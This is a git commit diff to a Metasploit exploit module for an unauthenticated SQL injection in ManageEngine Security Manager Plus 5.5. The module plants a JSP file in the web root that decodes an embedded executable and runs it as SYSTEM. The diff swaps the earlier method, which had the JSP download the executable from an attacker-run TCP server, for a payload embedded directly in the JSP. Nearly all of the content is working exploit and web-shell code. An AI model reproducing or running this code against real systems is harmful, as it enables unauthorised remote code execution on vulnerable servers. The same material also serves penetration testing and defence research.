Write EXE to JSP instead of using a TCPServer

unstable
sinn3r 2012-10-23 11:32:09 -05:00
parent e5ec51a780
commit 923ffe277d
1 changed files with 18 additions and 57 deletions

View File

@ -11,7 +11,6 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::TcpServer
include Msf::Exploit::EXE
def initialize(info={})
@ -19,10 +18,8 @@ class Metasploit3 < Msf::Exploit::Remote
'Name' => "ManageEngine Security Manager Plus 5.5 build 5505 SQL Injection",
'Description' => %q{
This module exploits a SQL injection found in ManageEngine Security Manager Plus
advanced search page. It will send a malicious SQL query to create a JSP file
under the web root directory, and then let it download and execute our malicious
executable under the context of SYSTEM. Authentication is not required in order
to exploit this vulnerability.
advanced search page, which results in remote code execution under the context of
SYSTEM. Authentication is not required in order to exploit this vulnerability.
},
'License' => MSF_LICENSE,
'Author' =>
@ -87,16 +84,6 @@ class Metasploit3 < Msf::Exploit::Remote
end
#
# Transfer the malicious executable to our victim
#
def on_client_connect(cli)
print_status("#{cli.peerhost}:#{cli.peerport} - Sending executable (#{@native_payload.length} bytes)")
cli.put(@native_payload)
service.close_client(cli)
end
#
# Generate a download+exe JSP payload
#
@ -104,43 +91,30 @@ class Metasploit3 < Msf::Exploit::Remote
my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address("50.50.50.50") : datastore['SRVHOST']
my_port = datastore['SRVPORT']
var_buf = Rex::Text.rand_text_alpha(rand(8) + 3)
var_shellcode = Rex::Text.rand_text_alpha(rand(8) + 3)
var_outstream = Rex::Text.rand_text_alpha(rand(8) + 3)
var_socket = Rex::Text.rand_text_alpha(rand(8) + 3)
var_bufreader = Rex::Text.rand_text_alpha(rand(8) + 3)
var_decoder = Rex::Text.rand_text_alpha(rand(8) + 3)
var_temp = Rex::Text.rand_text_alpha(rand(8) + 3)
var_path = Rex::Text.rand_text_alpha(rand(8) + 3)
var_proc = Rex::Text.rand_text_alpha(rand(8) + 3)
native_payload = Rex::Text.encode_base64(generate_payload_exe)
native_payload_name = rand_text_alpha(rand(6)+3)
jsp = %Q|
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>
<%@page import="sun.misc.BASE64Decoder"%>
<%
StringBuffer #{var_buf} = new StringBuffer();
byte[] #{var_shellcode} = null;
BufferedOutputStream #{var_outstream} = null;
byte[] shellcode = null;
BufferedOutputStream outstream = null;
try {
Socket #{var_socket} = new Socket("#{my_host}", #{my_port});
BufferedReader #{var_bufreader} = new BufferedReader(new InputStreamReader(#{var_socket}.getInputStream()));
while (#{var_buf}.length() < #{@native_payload.length}) {
#{var_buf}.append( (char) #{var_bufreader}.read());
}
String buf = "#{native_payload}";
BASE64Decoder #{var_decoder} = new BASE64Decoder();
#{var_shellcode} = #{var_decoder}.decodeBuffer(#{var_buf}.toString());
BASE64Decoder decoder = new BASE64Decoder();
shellcode = decoder.decodeBuffer(buf.toString());
File #{var_temp} = File.createTempFile("#{@native_payload_name}", ".exe");
String #{var_path} = #{var_temp}.getAbsolutePath();
File temp = File.createTempFile("#{native_payload_name}", ".exe");
String path = temp.getAbsolutePath();
#{var_outstream} = new BufferedOutputStream(new FileOutputStream(#{var_path}));
#{var_outstream}.write(#{var_shellcode});
#{var_outstream}.close();
outstream = new BufferedOutputStream(new FileOutputStream(path));
outstream.write(shellcode);
outstream.close();
Process #{var_proc} = Runtime.getRuntime().exec(#{var_path});
Process p = Runtime.getRuntime().exec(path);
} catch (Exception e) {}
%>
|
@ -156,9 +130,6 @@ class Metasploit3 < Msf::Exploit::Remote
# Run the actual exploit
#
def inject_exec
# This little lag is meant to ensure the TCP server runs first before the requests
select(nil, nil, nil, 1)
# Inject our JSP payload
hex_jsp = generate_jsp_payload
@ -211,19 +182,9 @@ class Metasploit3 < Msf::Exploit::Remote
# The server must start first, and then we send the malicious requests
#
def exploit
# Avoid passing this as an argument for performance reasons
# This is in base64 is make sure our file isn't mangled
@native_payload = [generate_payload_exe].pack("m*")
@native_payload_name = rand_text_alpha(rand(6)+3)
@jsp_name = rand_text_alpha(rand(6)+3)
@outpath = "\"../../webapps/SecurityManager/#{@jsp_name + '.jsp'}\""
begin
t = framework.threads.spawn("reqs", false) { inject_exec }
print_status("Serving executable on #{datastore['SRVHOST']}:#{datastore['SRVPORT']}")
super
ensure
t.kill
end
inject_exec
end
end